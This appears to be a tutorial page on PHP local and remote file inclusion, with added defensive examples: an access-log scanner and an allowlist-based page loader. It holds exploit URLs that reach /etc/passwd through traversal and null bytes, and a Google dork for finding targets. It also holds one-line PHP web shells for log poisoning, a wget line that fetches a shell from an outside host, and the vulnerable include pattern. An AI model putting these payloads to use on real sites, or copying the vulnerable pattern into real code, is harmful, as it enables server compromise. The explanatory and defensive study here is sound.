LFI-RFI

LFI And RFI Vulnerabilities

LFI and RFI: The Website Security Vulnerabilities

A file inclusion vulnerability is a class of vulnerability that most commonly affects web applications that rely on a scripting runtime. It arises when an application builds the path to executable code from an attacker-controlled variable in a way that lets the attacker choose which file is executed at run time.

A file inclusion vulnerability is distinct from a generic directory traversal attack: directory traversal is a way of gaining unauthorized file system access, whereas a file inclusion vulnerability subverts how an application loads code for execution. Successful exploitation of a file inclusion vulnerability results in remote code execution on the web server that runs the affected web application.

Local File Inclusion:

Local File Inclusion (LFI) is similar to a Remote File Inclusion vulnerability, except that instead of remote files only local files, i.e. files already on the server, can be included for execution. This can still lead to remote code execution if the included file contains attacker-controlled data, such as the web server's access logs.

Examples of LFI

Type of call:
require($file);
Exploit:
http://host/?file=/etc/passwd

Type of call:
require("includes/".$file);
Exploit:
http://host/?file=../../../../../etc/passwd

Type of calls:
require("languages/".$lang.".php");
require("themes/".$theme."/config.php");
Exploit:
http://host/?file=../../../../../etc/passwd%00
(The trailing %00 relies on null-byte truncation to cut off the appended suffix; PHP rejects paths containing a null byte since version 5.3.4, so this variant only works on older interpreters.)

Type of call:
require("languages/".$_COOKIE['lang'].".php");
Exploit:
javascript:document.cookie = "lang=../../../../../etc/passwd%00";

The pattern that makes this possible is a script that passes a request parameter straight to include(), which lets any file on the server be included and shown in the browser:
<?php include($_GET['']); ?>

Google dork: inurl:.php?page=
Example: www.xyz.com/contacts.php?page=abc.php
www.xyz.com/abc.php?id=5
Test: www.xyz.com/contacts.php?page=../xyz.php

On a Linux server the file /etc/passwd lists the username of every account, including those of all the domains hosted on the same server; on modern systems the password hashes themselves are kept in /etc/shadow, which is readable only by root, so /etc/passwd mainly serves as the classic proof that arbitrary files can be read.
1. www.abc.org/index.php?page=../../../../etc/passwd%00
2. www.abc.com/index.php?page=../../../../etc/passwd

/proc/self/environ contains data the end user can influence (on some server configurations request headers are exported into the process environment), and /var/log/httpd-access.log likewise records user-supplied request data; /usr/local/apache/conf/httpd.conf gives the paths of all log files. These locations matter because whatever is written into them can be included back through the LFI (log poisoning); the one-line shells below and the wget download are the payloads commonly seen in such attacks:
<?php passthru($_GET['cmd']); ?>
<?php system($_GET['cmd']); ?>
<?php exec($_GET['cmd']); ?>
wget http://xyz.com/abc.txt -O shell.php
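As an added example (not code from the original article), a small PHP command-line script that scans Apache combined-format access-log lines for the indicators described above: traversal sequences, %00, parameters pointing at remote URIs, the sensitive paths named on this page, and PHP tags in the User-Agent, which is where a log-poisoning payload lands. The log lines are constructed for the demo, and the regular expressions and function names are the example's own.

```php
<?php
// Added example (not from the original article): scan Apache access-log lines
// for the LFI/RFI indicators the article describes. The log lines below are
// constructed for the demo, not taken from a real server.

// Indicators: name => regular expression applied to the decoded request line
// and to the User-Agent field (where log-poisoning payloads would land).
const INDICATORS = [
    'traversal'  => '~(\.\./|\.\.\\\\)~',            // ../ or ..\ sequences
    'null_byte'  => '~%00|\x00~',                    // null-byte truncation attempt
    'remote_url' => '~[?&][^=]+=(https?|ftp)://~i',  // parameter pointing at a remote URI
    'sensitive'  => '~/etc/passwd|/proc/self/environ|httpd\.conf~i',
    'php_tag'    => '~<\?php~i',                     // PHP code where only text belongs
];

function parse_log_line(string $line): ?array
{
    // Combined log format: host ident user [time] "request" status size "referer" "agent"
    $re = '~^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) \S+ "([^"]*)" "([^"]*)"$~';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    return ['ip' => $m[1], 'time' => $m[2], 'request' => $m[3], 'status' => (int)$m[4], 'agent' => $m[6]];
}

// Returns the list of indicator names that fire for one log line
function classify(string $line): array
{
    $entry = parse_log_line($line);
    if ($entry === null) {
        return [];
    }
    // Decode once so %2e%2e%2f and similar encodings are matched as ../
    $decoded = rawurldecode($entry['request']);
    $hits = [];
    foreach (INDICATORS as $name => $pattern) {
        if (preg_match($pattern, $decoded) || preg_match($pattern, $entry['agent'])) {
            $hits[] = $name;
        }
    }
    return $hits;
}

// Constructed sample: one benign request, then the kinds of requests described above
$sample = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?page=contacts HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?page=../../../../etc/passwd%00 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Oct/2023:13:55:41 +0000] "GET /index.php?page=%2e%2e%2f%2e%2e%2fproc/self/environ HTTP/1.1" 200 4096 "-" "<?php system($_GET[\'cmd\']); ?>"',
    '203.0.113.9 - - [10/Oct/2023:13:55:45 +0000] "GET /contacts.php?page=http://attacker.example/shell.txt HTTP/1.1" 500 0 "-" "curl/8.0"',
];

foreach ($sample as $line) {
    $hits  = classify($line);
    $entry = parse_log_line($line);
    printf("%-12s %-5s %s\n", $entry['ip'], $hits ? 'ALERT' : 'ok', implode(',', $hits));
}
```

Run it with `php scan.php`; the first line reports ok, the second fires traversal, null_byte and sensitive, the third fires traversal, sensitive and php_tag (the payload sits in the User-Agent, not the URL), and the fourth fires remote_url. Decoding the request before matching is what catches the %2e%2e%2f form; matching the User-Agent separately is what catches a poisoning attempt that a URL-only rule would miss.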

How to Test Local File Inclusion

Since LFI occurs when paths passed to include statements are not properly sanitized, in a black-box testing approach we should look for scripts that take filenames as parameters.

Consider the following example:

http://vulnerable_host/preview.php?file=example.html

This looks like a perfect place to try for LFI. If the script includes the input parameter directly, instead of selecting the appropriate page from an array by its name, it is possible to include arbitrary files on the server.

A typical proof of concept is to load the passwd file:

http://vulnerable_host/preview.php?file=../../../../etc/passwd

Remote File Inclusion:

Remote File Inclusion (RFI) occurs when the web application downloads and executes a remote file. These remote files are usually obtained in the form of an HTTP or FTP URI as a user-supplied parameter to the web application.

RFI – Remote file inclusion

If allow_url_include is On in php.ini, a shell can be injected directly. (allow_url_include exists since PHP 5.2.0 and defaults to Off; before that version remote includes were governed by allow_url_fopen, which defaults to On.)

You only need to send a GET or POST request whose parameter points directly at a URI serving the shell (using a non-PHP extension):
www.xyz.com/contacts.php?page=http://www.abc.com/shell.php

How To Test RFI

Since RFI occurs when paths passed to include statements are not properly sanitized, in a black-box testing approach we should look for scripts that take filenames as parameters. Consider the following PHP example:

$incfile = $_REQUEST["file"];
include($incfile.".php");

In this example the path is extracted from the HTTP request and no input validation is done (for example, by checking the input against a whitelist), so this snippet of code is vulnerable to this type of attack. Consider in fact the following URL:

http://vulnerable_host/vuln_page.php?file=http://attacker_site/malicious_page

In this case the remote file is included and any code it contains is run by the server.
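As an added example (not code from the original article), the vulnerable include pattern shown above placed next to a hardened page loader. It serves both the LFI discussion earlier on the page (the include($_GET[...]) pattern and its %00 and cookie variants) and the RFI case here: a fixed map from page names to files means traversal sequences, null bytes and remote URLs never reach include() at all, and a realpath() check adds a second line of defence. The page names, the pages/ directory, and the function names are illustrative assumptions; the php.ini directives in the comments are real PHP settings.

```php
<?php
// Added example (not from the original article): the article's vulnerable
// pattern beside a hardened page loader. PAGES, resolve_page(), load_page()
// and the pages/ directory are illustrative assumptions.

// --- Vulnerable: the request parameter becomes the include path ---
// (the article's own pattern; '../../etc/passwd', a '%00'-terminated name or
//  'http://attacker/shell' all reach include() unchanged)
function load_page_vulnerable(string $file): void
{
    include($file . ".php");
}

// --- Hardened: a fixed map from page names to files ---
// Only keys present in PAGES can ever be included, so user input never
// becomes part of a path. The map is the primary control; the realpath()
// test below is defence in depth (it also catches a symlinked entry).
const PAGES = [
    'home'     => 'home.php',
    'contacts' => 'contacts.php',
    'about'    => 'about.php',
];

function resolve_page(string $name): ?string
{
    if (!array_key_exists($name, PAGES)) {
        return null;                       // unknown name: refuse, never guess
    }
    $base = realpath(__DIR__ . '/pages');
    $path = realpath($base . '/' . PAGES[$name]);
    // realpath() returns false for missing files and collapses any '..',
    // so a path outside the pages directory can be rejected reliably
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

function load_page(string $name): void
{
    $path = resolve_page($name);
    if ($path === null) {
        http_response_code(404);
        echo 'Unknown page';
        return;
    }
    include($path);
}

// Runtime guard for the RFI case: even with the allowlist, the interpreter
// should not be able to fetch remote code. allow_url_include defaults to Off
// (since PHP 5.2.0) and should stay that way; allow_url_fopen is the related
// setting for plain file reads. The corresponding php.ini lines are:
//   allow_url_include = Off
//   allow_url_fopen   = Off
//   open_basedir      = /var/www/site    ; confines every file operation
if (filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN)) {
    error_log('allow_url_include is On: remote file inclusion is possible');
}

load_page($_GET['page'] ?? 'home');
```

With this loader a request such as ?page=../../../../etc/passwd, ?page=contacts%00 or ?page=http://attacker_site/malicious_page simply gets a 404, because none of those strings is a key of PAGES; the input is used only to look something up, never to build a filename. Reading the parameter from $_GET alone (not $_REQUEST or a cookie) also removes the cookie variant shown earlier on the page.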